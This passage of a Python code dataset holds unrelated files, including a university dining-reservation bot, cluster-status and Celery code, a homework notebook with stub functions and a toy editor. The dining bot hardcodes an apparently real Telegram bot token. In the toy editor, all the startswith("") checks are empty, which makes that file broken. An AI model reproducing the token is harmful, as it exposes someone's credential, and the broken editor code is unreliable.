cluster_status = get_cluster_status()\n\n # If the response should be only the summary\n if summary_response:\n short_status = cluster_status.get(STATUS)\n status_code = 500 if short_status == ServiceStatus.FAIL else 200\n return {'status': short_status, 'services': {}}, status_code\n\n return cluster_status\n\n\nclass ManagerClusterStatus(ClusterStatus):\n @authorize('manager_cluster_status_put')\n def put(self, node_id):\n self._update_manager_last_seen(node_id)\n self._write_report(node_id,\n models.Manager,\n CloudifyNodeType.MANAGER)\n\n @staticmethod\n def _update_manager_last_seen(node_id):\n report = request.json.get('report', {})\n if report.get('status') != ServiceStatus.HEALTHY:\n current_app.logger.debug(\n \"The manager with node_id: {0} is not healthy, so it's \"\n \"last_seen is not updated\".format(node_id)\n )\n return\n\n storage_manager = get_storage_manager()\n manager = storage_manager.get(models.Manager, None,\n filters={'node_id': node_id})\n manager_time = parse_datetime_string(manager.last_seen)\n report_time = request.json.get('timestamp')\n if report_time and manager_time < parse_datetime_string(report_time):\n manager.last_seen = get_formatted_timestamp()\n manager.status_report_frequency = request.json.get(\n 'reporting_freq')\n storage_manager.update(manager)\n\n\nclass DBClusterStatus(ClusterStatus):\n @authorize('db_cluster_status_put')\n def put(self, node_id):\n self._write_report(node_id,\n models.DBNodes,\n CloudifyNodeType.DB)\n\n\nclass BrokerClusterStatus(ClusterStatus):\n @authorize('broker_cluster_status_put')\n def put(self, node_id):\n self._write_report(node_id,\n models.RabbitMQBroker,\n CloudifyNodeType.BROKER)\n","sub_path":"rest-service/manager_rest/rest/resources_v3_1/cluster_status.py","file_name":"cluster_status.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"121795363","text":"import re\n\nimport imgkit\nimport jdatetime\nimport pandas as pd\nimport requests\nimport telegram\nfrom bs4 import BeautifulSoup\nfrom celery import task\nfrom django.db.models import Q\nfrom lxml import html\n\n\ndef login(user_data):\n login_url = user_data.university.login_url\n session_requests = requests.session()\n result = session_requests.get(login_url)\n csrf = user_data.university.csrf_name\n tree = html.fromstring(result.text)\n authenticity_token = list(set(tree.xpath(f\"//input[@name='{csrf}']/@value\")))[0]\n payload = {\n user_data.university.form_username: user_data.dining_username,\n user_data.university.form_password: user_data.dining_password,\n user_data.university.csrf_name: authenticity_token,\n }\n result = session_requests.post(login_url, data=payload, headers=dict(referer=login_url))\n if 'login' not in result.url:\n return session_requests.cookies\n else:\n raise ValueError\n\n\ndef get_user_id(cookie):\n reserve_url = 'http://dining.sharif.ir/admin/food/food-reserve/reserve'\n session_requests = requests.session()\n session_requests.cookies = cookie\n result = session_requests.get(reserve_url)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n try:\n button = soup.find_all('button', class_=\"btn btn-default navigation-link\")[0].get('onclick')\n return button.split(';')[0].split(',')[4][:-1]\n except IndexError:\n raise ValueError\n\n\ndef get_next_week_dishes(user_data, cookie, self_id, user_id):\n from dining.models import Food, UserPreferableFood\n\n session_requests = requests.session()\n session_requests.cookies = cookie\n\n 
next_week = {\n 'id': 0,\n 'parent_id': self_id,\n 'week': 1,\n 'user_id': user_id\n }\n\n load_reserve_table = 'http://dining.sharif.ir/admin/food/food-reserve/load-reserve-table'\n\n result = session_requests.post(load_reserve_table, data=next_week)\n\n soup = BeautifulSoup(result.content, 'html.parser')\n\n table_rows = soup.find_all('tr')[1:]\n\n data_lunch = dict()\n data_dinner = dict()\n for row in table_rows:\n day = re.findall(r'\\s+(.*?)\\s\\s', str(row))[0]\n lunch = row.find_all('td')[0].find_all('div')\n dishes = list()\n for dish in lunch:\n try:\n food_name = dish.text.split('(')[0].strip()\n food_id = dish.find('span').get('onclick').split('do_reserve_from_diet(')[1].split(',')[0].strip('\\\"')\n query = Food.objects.filter(name__icontains=food_name, university=user_data.university)\n if query:\n dishes.append((query[0].name, food_id))\n else:\n new_food = Food()\n new_food.name = food_name\n new_food.id = food_id\n new_food.save()\n dishes.append((food_name, food_id))\n preferred_food_object = UserPreferableFood()\n preferred_food_object.user = user_data.user\n preferred_food_object.food = new_food\n preferred_food_object.score = 5\n preferred_food_object.save()\n\n except:\n pass\n data_lunch[day] = dishes\n\n dinner = row.find_all('td')[1].find_all('div')\n dishes = list()\n for dish in dinner:\n try:\n food_name = dish.text.split('(')[0].strip()\n food_id = dish.find('span').get('onclick').split('do_reserve_from_diet(')[1].split(',')[0].strip('\\\"')\n query = Food.objects.filter(name__icontains=food_name, university=user_data.university)\n if query:\n dishes.append((query[0].name, food_id))\n else:\n new_food = Food()\n new_food.name = food_name\n new_food.id = food_id\n new_food.save()\n dishes.append((food_name, food_id))\n preferred_food_object = UserPreferableFood\n preferred_food_object.user = user_data.user\n preferred_food_object.food = new_food\n preferred_food_object.score = 5\n preferred_food_object.save()\n\n except:\n pass\n\n data_dinner[day] = dishes\n\n return data_lunch, data_dinner\n\n\ndef save_values(user_data, data_lunch, data_dinner, self_id):\n from dining.models import Dicty, Key, Val\n\n try:\n dictionary_model = Dicty.objects.get(name=user_data.user.username + 'data_dinner' + f'{self_id}')\n Key.objects.filter(container__name=user_data.user.username + 'data_dinner' + f'{self_id}').delete()\n\n\n except:\n dictionary_model = Dicty()\n dictionary_model.name = user_data.user.username + 'data_dinner' + f'{self_id}'\n dictionary_model.save()\n\n for item in data_dinner:\n key = Key()\n key.container = dictionary_model\n key.key = item\n key.save()\n for food in data_dinner[item]:\n value = Val()\n value.key = key\n value.container = dictionary_model\n value.name = food[0]\n value.food_id = food[1]\n value.save()\n try:\n dictionary_model = Dicty.objects.get(name=user_data.user.username + 'data_lunch' + f'{self_id}')\n Key.objects.filter(container__name=user_data.user.username + 'data_lunch' + f'{self_id}').delete()\n\n except:\n dictionary_model = Dicty()\n dictionary_model.name = user_data.user.username + 'data_lunch' + f'{self_id}'\n dictionary_model.save()\n\n for item in data_lunch:\n key = Key()\n key.container = dictionary_model\n key.key = item\n key.save()\n for food in data_lunch[item]:\n value = Val()\n value.key = key\n value.container = dictionary_model\n value.name = food[0]\n value.food_id = food[1]\n value.save()\n\n\ndef do_reserve(food_id, self_id, user_id, cookie):\n food_reserve_request = {\n 'id': food_id,\n 'place_id': 
self_id,\n 'food_place_id': '0',\n 'self_id': self_id,\n 'user_id': user_id\n }\n session_requests = requests.session()\n session_requests.cookies = cookie\n result = session_requests.post(\n 'http://dining.sharif.ir/admin/food/food-reserve/do-reserve-from-diet?user_id=' + user_id,\n data=food_reserve_request)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n\ndef get_reserved_table(user_data, user_id, cookie):\n session_requests = requests.session()\n session_requests.cookies = cookie\n next_week_reserved_table = {\n 'week': '1',\n 'user_id': user_id\n }\n url_reserved_table = user_data.university.reserved_table\n result = session_requests.post(url_reserved_table, data=next_week_reserved_table)\n soup = BeautifulSoup(result.content, 'html.parser')\n\n table_rows = soup.find_all('tr')[1:]\n\n data_lunch = dict()\n data_dinner = dict()\n for row in table_rows:\n day = re.findall(r'\\s+(.*?)\\s\\s', str(row))[0]\n lunch = row.find_all('td')[0]\n dishes = list()\n try:\n food_name = lunch.text.split('(')[0].strip()\n dishes.append(food_name)\n except:\n dishes.append('-')\n data_lunch[day] = dishes\n\n dinner = row.find_all('td')[1]\n dishes = list()\n try:\n food_name = dinner.find_all('span')[0].text.strip()\n dishes.append(food_name)\n except:\n dishes.append('-')\n\n data_dinner[day] = dishes\n\n result = session_requests.get('http://dining.sharif.ir/admin/payment/payment/charge')\n soup = BeautifulSoup(result.text, 'html.parser')\n soup_find = soup.find_all('h4', {'class': 'control-label'})\n credit_raw = soup_find[0].find_all('span', {'dir': 'ltr'})[0].text.strip()\n credit = float(re.sub(',', '.', credit_raw))\n\n return data_lunch, data_dinner, credit\n\n\ndef telegram_table_message(user_data, data_lunch, data_dinner):\n if user_data.user.chat_id != 0:\n data = {'ناهار': [data_lunch['شنبه'], data_lunch['یک شنبه'], data_lunch['دوشنبه'],\n data_lunch['سه شنبه'], data_lunch['چهارشنبه'], data_lunch['پنج شنبه'],\n data_lunch['جمعه']],\n 'شام': [data_dinner['شنبه'], data_dinner['یک شنبه'], data_dinner['دوشنبه'],\n data_dinner['سه شنبه'], data_dinner['چهارشنبه'], data_dinner['پنج شنبه'],\n data_dinner['جمعه']]}\n df = pd.DataFrame(data,\n index=['شنبه', 'یکشنبه', 'دوشنبه', 'سه‌شنبه', 'چهارشنبه', 'پنجشنبه', 'جمعه'])\n\n css = \"\"\"\n \n \n \n \n \n \"\"\"\n with open('html.html', 'w') as f:\n f.write('')\n text_file = open(\"html.html\", \"a\")\n text_file.write(css)\n text_file.write(df.to_html())\n text_file.close()\n imgkitoptions = {\"format\": \"png\"}\n imgkit.from_file(\"html.html\", 'reserve_img.png', options=imgkitoptions)\n\n def send_photo(path, chat_id, token):\n bot = telegram.Bot(token=token)\n bot.send_photo(chat_id=chat_id, photo=open(path, 'rb'))\n\n def send(msg, chat_id, token, keyboard):\n bot = telegram.Bot(token=token)\n bot.send_message(chat_id=chat_id, text=msg, reply_markup=keyboard)\n\n bot_token = '610448118:AAFVPBXMKPzqAiOJ9-zhusKrOloCiJuEwi8'\n message = \"سلام\\n\" \\\n \"امروز چهارشنبه‌س و غذاهاتو برات رزرو کردم \\n\" \\\n \"اگر از هر کدومشون خوشت نیمد یا خواستی روز جدیدی رو رزرو کنی دکمه‌ی تغییر رزرو رو فشار بده\"\n reply_markup = telegram.ReplyKeyboardMarkup(\n [[telegram.KeyboardButton('تغییر رزرو')]], one_time_keyboard=False)\n send(message, str(user_data.user.chat_id), bot_token, reply_markup)\n send_photo(path='reserve_img.png',\n chat_id=str(user_data.user.chat_id),\n token=bot_token)\n\n\n@task()\ndef reserve_function():\n from dining.models import UserDiningData, UserSelfs, UserPreferableFood, ReservedTable\n for user_data in 
UserDiningData.objects.filter(university__tag='sharif'):\n if user_data.user.is_paid is True and user_data.user.reserve is True:\n\n active_selfs = UserSelfs.objects.filter(user=user_data.user, is_active=True)\n try:\n cookie = login(user_data)\n except ValueError:\n continue\n try:\n user_id = get_user_id(cookie)\n except ValueError:\n continue\n\n for self in active_selfs:\n\n data_lunch, data_dinner = get_next_week_dishes(user_data, cookie, self.self_id, user_id)\n save_values(user_data, data_lunch, data_dinner, self.self_id)\n\n chosen_days_lunch = []\n\n if user_data.reserve_friday_lunch:\n chosen_days_lunch.append('جمعه')\n if user_data.reserve_saturday_lunch:\n chosen_days_lunch.append('شنبه')\n if user_data.reserve_sunday_lunch:\n chosen_days_lunch.append('یک شنبه')\n if user_data.reserve_monday_lunch:\n chosen_days_lunch.append('دوشنبه')\n if user_data.reserve_tuesday_lunch:\n chosen_days_lunch.append('سه شنبه')\n if user_data.reserve_wednesday_lunch:\n chosen_days_lunch.append('چهارشنبه')\n if user_data.reserve_thursday_lunch:\n chosen_days_lunch.append('پنج شنبه')\n\n chosen_days_dinner = []\n\n if user_data.reserve_friday_dinner:\n chosen_days_dinner.append('جمعه')\n if user_data.reserve_saturday_dinner:\n chosen_days_dinner.append('شنبه')\n if user_data.reserve_sunday_dinner:\n chosen_days_dinner.append('یک شنبه')\n if user_data.reserve_monday_dinner:\n chosen_days_dinner.append('دوشنبه')\n if user_data.reserve_tuesday_dinner:\n chosen_days_dinner.append('سه شنبه')\n if user_data.reserve_wednesday_lunch:\n chosen_days_dinner.append('چهارشنبه')\n if user_data.reserve_thursday_dinner:\n chosen_days_dinner.append('پنج شنبه')\n\n for day in chosen_days_lunch:\n preferred_foods = []\n for dish in data_lunch[day]:\n if UserPreferableFood.objects.filter(~Q(score=0), user=user_data.user,\n food__name=dish[0].strip()):\n preferred_foods.append((dish[1], UserPreferableFood.objects.filter(\n user=user_data.user,\n food__name=dish[0])[0].score))\n preferred_foods.sort(key=lambda x: x[1], reverse=True)\n if preferred_foods:\n do_reserve(preferred_foods[0][0], self.self_id, user_id, cookie)\n\n for day in chosen_days_dinner:\n preferred_foods = []\n for dish in data_dinner[day]:\n if UserPreferableFood.objects.filter(~Q(score=0), user=user_data.user, food__name=dish[0]):\n preferred_foods.append((dish[1], UserPreferableFood.objects.filter(\n user=user_data.user,\n food__name=dish[0])[0].score))\n preferred_foods.sort(key=lambda x: x[1], reverse=True)\n if preferred_foods:\n do_reserve(preferred_foods[0][0], self.self_id, user_id, cookie)\n\n data_lunch, data_dinner, credit = get_reserved_table(user_data, user_id, cookie)\n\n date = str(jdatetime.date.today() + jdatetime.timedelta(3))\n date = re.sub(r'\\-', '/', date)\n saturdays_date = list()\n saturdays_date.append(date)\n saturdays_date = str(saturdays_date)\n\n filter = ReservedTable.objects.filter(user=user_data.user, week_start_date=saturdays_date)\n flag = True\n if not filter:\n reserved = ReservedTable()\n reserved.user = user_data.user\n\n reserved.week_start_date = saturdays_date\n\n reserved.friday_lunch = data_lunch['جمعه'][0]\n reserved.saturday_lunch = data_lunch['شنبه'][0]\n reserved.sunday_lunch = data_lunch['یک شنبه'][0]\n reserved.monday_lunch = data_lunch['دوشنبه'][0]\n reserved.tuesday_lunch = data_lunch['سه شنبه'][0]\n reserved.wednesday_lunch = data_lunch['چهارشنبه'][0]\n reserved.thursday_lunch = data_lunch['پنج شنبه'][0]\n\n reserved.friday_dinner = data_dinner['جمعه'][0]\n reserved.saturday_dinner = 
data_dinner['شنبه'][0]\n reserved.sunday_dinner = data_dinner['یک شنبه'][0]\n reserved.monday_dinner = data_dinner['دوشنبه'][0]\n reserved.tuesday_dinner = data_dinner['سه شنبه'][0]\n reserved.wednesday_dinner = data_dinner['چهارشنبه'][0]\n reserved.thursday_dinner = data_dinner['پنج شنبه'][0]\n\n reserved.credit = credit\n\n reserved.save()\n\n else:\n flag = False\n filter[0].friday_lunch = data_lunch['جمعه'][0]\n filter[0].saturday_lunch = data_lunch['شنبه'][0]\n filter[0].sunday_lunch = data_lunch['یک شنبه'][0]\n filter[0].monday_lunch = data_lunch['دوشنبه'][0]\n filter[0].tuesday_lunch = data_lunch['سه شنبه'][0]\n filter[0].wednesday_lunch = data_lunch['چهارشنبه'][0]\n filter[0].thursday_lunch = data_lunch['پنج شنبه'][0]\n\n filter[0].friday_dinner = data_dinner['جمعه'][0]\n filter[0].saturday_dinner = data_dinner['شنبه'][0]\n filter[0].sunday_dinner = data_dinner['یک شنبه'][0]\n filter[0].monday_dinner = data_dinner['دوشنبه'][0]\n filter[0].tuesday_dinner = data_dinner['سه شنبه'][0]\n filter[0].wednesday_dinner = data_dinner['چهارشنبه'][0]\n filter[0].thursday_dinner = data_dinner['پنج شنبه'][0]\n\n filter[0].credit = credit\n\n filter[0].save()\n\n if flag:\n try:\n telegram_table_message(user_data, data_lunch, data_dinner)\n except:\n continue\n","sub_path":"dining/tasks/reservation_sharif.py","file_name":"reservation_sharif.py","file_ext":"py","file_size_in_byte":18000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633359863","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('images/NTNUME.png', cv2.IMREAD_GRAYSCALE)\n\nplt.imshow(image, cmap='gray')\nplt.axis('off')\nplt.show()\n\ncv2.imwrite('images/NTNUME_new.png', image)\n","sub_path":"Machine-Learning/Preprocessing-Images/code/Save-Images.py","file_name":"Save-Images.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"113634270","text":"wid = int(input(\"Width: \"))\n\n#no. 
of lines will be double the width\n#each loop prints a line.\nfor i in range(wid *2):\n\n #first half of the diamond\n if i<=wid:\n no_of_spaces = wid - i\n no_of_stars = i\n print(\" \"*no_of_spaces + \"* \"*no_of_stars) \n\n #next half of the diamond\n else:\n no_of_spaces = i - wid\n no_of_stars = 2*wid - i\n print(\" \"*no_of_spaces + \"* \"*no_of_stars) \n","sub_path":"diamond.py","file_name":"diamond.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"170882239","text":"import json\nimport traceback\nfrom celery import Task\nfrom redis import Redis\nfrom celery_app import RESULT_POOL\nfrom celery._state import _task_stack\nfrom celery.utils.log import get_task_logger\nfrom backend.Model.connection import SESSION\nfrom backend.myBluePrint.ericic_v2.model.refresh_task_history_table import RefreshTaskHistoryModel\n\nlogger = get_task_logger(__name__)\n\n\nclass DBFreshBase(Task):\n #: Request class used, or the qualified name of one.\n Request = 'celeryFolder.taskModel.customer.db_refresh_request:DBRefreshRequest'\n\n def __call__(self, *args, **kwargs):\n request = self.request\n job_id = request.id\n db_session = SESSION()\n # the status of record always follows a linear change, so does not use the version\n try:\n db_session.query(RefreshTaskHistoryModel).filter(RefreshTaskHistoryModel.id == job_id).update(\n {'status': 'running'})\n db_session.commit()\n except:\n db_session.rollback()\n msg = traceback.format_exc()\n logger.info(msg)\n finally:\n db_session.close()\n _task_stack.push(self)\n self.push_request(args=args, kwargs=kwargs)\n try:\n return self.run(*args, **kwargs)\n finally:\n self.pop_request()\n _task_stack.pop()\n\n # task success call back\n def on_success(self, retval, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, successful!')\n self._self_call_back(task_id, 'successful')\n\n # task failure call back\n def on_failure(self, exc, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, failed! erros:{exc}')\n self._self_call_back(task_id, 'failed')\n\n # task retry call back\n def on_retry(self, exc, task_id, *args, **kwargs):\n logger.info(f'task id:{task_id}, arg:{args}, retry! 
einfo:{exc}')\n\n def _self_call_back(self, task_id, status):\n rds = Redis(connection_pool=RESULT_POOL)\n db_session = SESSION()\n try:\n res = rds.get('celery-task-meta-%s' % task_id)\n res = json.loads(res)\n error = res['traceback']\n db_session.query(RefreshTaskHistoryModel).filter(RefreshTaskHistoryModel.id == task_id).update({\n 'status': status,\n 'error_info': error\n })\n db_session.commit()\n rds.delete('celery-task-meta-%s' % task_id)\n except Exception as e:\n db_session.rollback()\n raise e\n # TaskHistoryModel()\n finally:\n rds.close()\n db_session.close()\n","sub_path":"gzbj/optimus_2.1/optimus/celeryFolder/taskModel/db_fresh/taskBase.py","file_name":"taskBase.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"616404235","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 20 15:34:24 2017\n\n@author: Lafungo\n\"\"\"\n\nimport datetime\n\nstart = datetime.datetime.now()\n\nf = open('p067_triangle.txt', 'r')\n\nnumbers = []\n\nfor line in f:\n numbers.append(line.strip().split())\n\nf.close()\n \nfor row in reversed(range(len(numbers) - 1)):\n for index in range(len(numbers[row])):\n numbers[row][index] = int(numbers[row][index]) + \\\n max([int(numbers[row + 1][index]), \n int(numbers[row + 1][index + 1])]) \n\nprint(numbers[0][0])\n\nend = datetime.datetime.now()\nprint(end - start)\n","sub_path":"p67.py","file_name":"p67.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"318741789","text":"import os;\nimport re;\n\ndef main():\n cl = 0;\n cf = \"\";\n numcheck = \"[^0-9]\";\n contents = [\"\"];\n proceed = True;\n while proceed == True:\n cltext = input();\n if cltext.startswith(\"\"):\n if os.path.exists(cf):\n for line in contents:\n print(line, end = \"\");\n else:\n print(\"That file does not exist!\");\n if cltext.startswith(\"\"):\n cf = input(\"Enter a filename here: \");\n if os.path.exists(cf):\n file = open(cf, \"r\");\n fcontents = file.readlines();\n file.close();\n for line in fcontents:\n print(line, end = \"\");\n else:\n print(\"That file does not exist!\");\n elif cltext.startswith(\"\"):\n if os.path.exists(cf):\n file = open(cf, \"a\");\n for line in range(len(contents)):\n file.write(contents[line]);\n file.close();\n elif cltext.startswith(\"\"):\n cf = input(\"Enter a filename here: \");\n file = open(cf, \"w\");\n file.write(\"\");\n file = open(cf, \"a\");\n for line in range(len(contents)):\n file.write(contents[line]);\n file.close();\n elif cltext.startswith(\"\"):\n for line in range(len(contents) - 1):\n print(str(line + 1) + \":\", contents[line], end = \"\");\n cl = input(\"Enter a line number here: \");\n if re.search(numcheck, cl):\n print(\"Invalid line number!\");\n else:\n cl = int(cl) - 1;\n if cl > len(contents):\n print(\"Invalid line number!\");\n else:\n contents[cl] = cltext + \"\\n\";\n contents.append(\"\");\n cl += 1;\n\nif __name__ == \"__main__\":\n main();\n","sub_path":"random/fedit.py","file_name":"fedit.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"570667951","text":"from nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nexample_sentence = \"Hello world this is my first nltk program. 
This is word tokenization in which the we will seperate all the words\"\nstop_words = set(stopwords.words(\"english\")) # This will print some of the stop words in english lanaguage\nwords = word_tokenize(example_sentence)\nuseful_words = [] # All the words which are not stop words in our sentence\nfor w in words:\n if w not in stop_words:\n useful_words.append(w)\nprint(useful_words)","sub_path":"basics/stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106825597","text":"import json\n\nimport pytest\n\nfrom burdock.restclient.models.project_run_details import ProjectRunDetails\n\n@pytest.mark.parametrize(\"project\", [{\"params\": {\"alpha\": .4}, \"uri\": \"https://github.com/mlflow/mlflow-example\"},\n {\"params\": {\"text\": \"this text\"}, \"uri\":\n \"./modules/module-example\"}])\ndef test_execute_run(client, project):\n details = ProjectRunDetails(params=json.dumps(project[\"params\"]),\n project_uri=project[\"uri\"])\n client.executerun(details)\n\n","sub_path":"tests/service/execute/test_smoke.py","file_name":"test_smoke.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"449498591","text":"#!flask/bin/python\nfrom upload_images import binary_to_image, get_db_collection\nfrom flask import Flask\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/image/')\ndef get_image_by_md5(md5):\n image = get_db_collection(\"image_handler\").find_one({\"md5\": md5})\n if not image:\n raise FileNotFoundError(f\"Can not found image with md5 {md5}\")\n binary_to_image(image[\"original_image\"]).show()\n return \"200 ok\"\n\n\n@app.route('/monitoring')\ndef monitor_images():\n agg_status = get_db_collection(\"image_status\").aggregate(\n [\n {\n \"$group\":\n {\n \"_id\": {\n \"minutes\": {\n \"$dateToString\": {\n \"date\": \"$created_at\",\n \"format\": \"%Y-%m-%dT%H:%M\"\n }\n },\n \"error_status\": \"$with_error\"\n },\n \"number_event\": {\n \"$sum\": 1\n }\n }\n }\n ]\n )\n df_agg_status = pd.DataFrame(list(agg_status))\n print(df_agg_status)\n df_agg_status.plot.hist()\n return \"200 ok\"\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"src/core/api_image.py","file_name":"api_image.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525560753","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.2'\n# jupytext_version: 1.2.1\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %% [markdown] {\"toc\": true}\n#

Table of Contents

\n# \n\n# %% [markdown]\n# # Stull problem 8-A.10\n\n# %% [markdown]\n# Chapter 8-A10. Write a python function to find the beamwidth angle in degrees for a radar pulse\n# for the following sets of\n# [wavelength (cm) , antenna\n# dish diameter (m)]:\n#\n# a. [ 20, 8] b. [20, 10] c. [10, 10] d. [10, 5] e. [10, 3]\n# f. [5, 7] g. [5, 5] h. [5, 2] i. [5, 3] j. [3, 1]\n\n# %% {\"deletable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"f78f1384818ecfda9aeae223ea83ec88\", \"grade\": false, \"grade_id\": \"cell-76c7d3f2f1ade0a7\", \"locked\": false, \"schema_version\": 2, \"solution\": true}}\nimport numpy as np\nimport pytest\nimport json\n\n\ndef find_beamwidth(the_wavel, dish_size):\n \"\"\"\n find the beamwidth using Stulll eq. 8.13\n \n Parameters\n ----------\n \n the_wavel : wavelength (float)\n units (cm)\n \n dish_size : antenna dish diameter (float)\n units (m)\n \n Returns\n -------\n \n beamwidth : beamwidth angle \n units (degrees)\n \"\"\"\n #\n # Stull eq. 8.13\n #\n # YOUR CODE HERE\n raise NotImplementedError()\n\n\n# %%\n## my test for a10\n\n# %% {\"deletable\": false, \"editable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"b325d081ec1cf53fcfb189ecd9604c75\", \"grade\": true, \"grade_id\": \"cell-fd6801804d7e081b\", \"locked\": true, \"points\": 4, \"schema_version\": 2, \"solution\": false}}\nthe_wavel = [20, 20, 10, 10, 10, 5, 5, 5, 5, 3] # wavelength (cm)\ndish_size = [8, 10, 10, 5, 3, 7, 5, 2, 3, 1] # dishsize (meters)\ninput_vals = list(zip(the_wavel, dish_size))\nassert len(input_vals) == 10\nbeamwidth = [find_beamwidth(wavel, dish_size) for wavel, dish_size in input_vals]\n#\n# test the beamwidth values\n#\nanswer_file = \"ch8_a10_answer.json\"\nif Path(answer_file).is_file():\n with open(answer_file, \"r\") as f:\n answer = json.load(f)\n np.testing.assert_array_almost_equal(beamwidth, answer, decimal=3)\n\n\n# %% [raw]\n# # Stull problem 8-A.12\n#\n# Write a python function to find the range to a radar target, given the\n# round-trip (return) travel times (µs) of:\n#\n# a. 2 b. 5 c. 10 d. 25 e. 50\n# f. 75 g. 100 h. 150 i. 200 j. 300\n\n# %% {\"deletable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"219c6f3d2faccba6ef83fbf664329f6e\", \"grade\": false, \"grade_id\": \"cell-8bce491044638790\", \"locked\": false, \"schema_version\": 2, \"solution\": true}}\ndef find_range(delT):\n \"\"\"\n tind the range to radar using Stull eq. 
8.16\n \n Parameters\n ----------\n \n delT: float\n the round-trip travel times (units: micro sec)\n \n Returns\n -------\n \n radar_range: float\n range from target to radar (units: km)\n \"\"\"\n\n # YOUR CODE HERE\n raise NotImplementedError()\n\n\n# %% [markdown]\n# ## my test for a12\n\n# %% {\"deletable\": false, \"editable\": false, \"nbgrader\": {\"cell_type\": \"code\", \"checksum\": \"f6408a71822220e4a6bfdb7ca4bb31c4\", \"grade\": true, \"grade_id\": \"cell-1fcb43fed3abde1d\", \"locked\": true, \"points\": 4, \"schema_version\": 2, \"solution\": false}}\nimport json\n\ntimes = [2, 5, 10, 25, 50, 75, 100, 150, 200, 300] # microseconds\nthe_range = [find_range(delT) for delT in times]\nassert len(times) == 10\nanswer_file = \"ch8_a12_answer.json\"\nif Path(answer_file).is_file():\n with open(answer_file, \"r\") as f:\n answer = json.load(f)\n np.testing.assert_array_almost_equal(the_range, answer, decimal=1)\n\n# %%\n","sub_path":"notebooks/python/stull_problems_a10_a12.py","file_name":"stull_problems_a10_a12.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358767657","text":"import os\nfrom config import config\nfrom logger import get_logger\nfrom db import connect_to_db, close_connection\nfrom .process_song_file import process_song_file\nfrom .process_log_file import process_log_file\n\n\n# Config\nDATA_SONG = config['DATA']['DATA_SONG']\nDATA_LOG = config['DATA']['DATA_LOG']\n\n\n# Setup logger\nlogger = get_logger('PROCESS-DATA')\n\n\ndef process_data(path, func):\n logger.info(f\"Start processing '{path}' data\")\n\n files = [os.path.join(dirpath, filename) for (dirpath, dirnames, filenames) in os.walk(path) for filename in filenames if filenames]\n file_amount = len(files)\n\n logger.info(f\"'{file_amount}' files found in '{path}'\")\n\n conn = connect_to_db()\n\n for i, file in enumerate(files, 1):\n func(conn, file)\n \n logger.info(f'{i}/{file_amount} files processed.')\n\n close_connection(conn)\n logger.info(f\"Finish processing '{path}' data\")\n\n\ndef etl():\n process_data(DATA_SONG, process_song_file)\n process_data(DATA_LOG, process_log_file)\n ","sub_path":"etl/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"285298055","text":"from datetime import datetime\nfrom decimal import Decimal\nfrom . import exceptions, settings\nimport logging\nimport soap\n\nlogger = logging.getLogger(__name__)\n\nPOSTCODE_LEN = 5\nPLUS4_LEN = 4\n\n\nclass CCHTaxCalculator(object):\n \"\"\"\n Simple interface between Python and the CCH Sales Tax Office SOAP API.\n \"\"\"\n\n precision = settings.CCH_PRECISION\n wsdl = settings.CCH_WSDL\n entity_id = settings.CCH_ENTITY\n divsion_id = settings.CCH_DIVISION\n max_retries = settings.CCH_MAX_RETRIES\n\n def __init__(self, breaker=None):\n \"\"\"\n Construct a CCHTaxCalculator instance\n\n You may optionally supply a ``pybreaker.CircuitBreaker`` instance. 
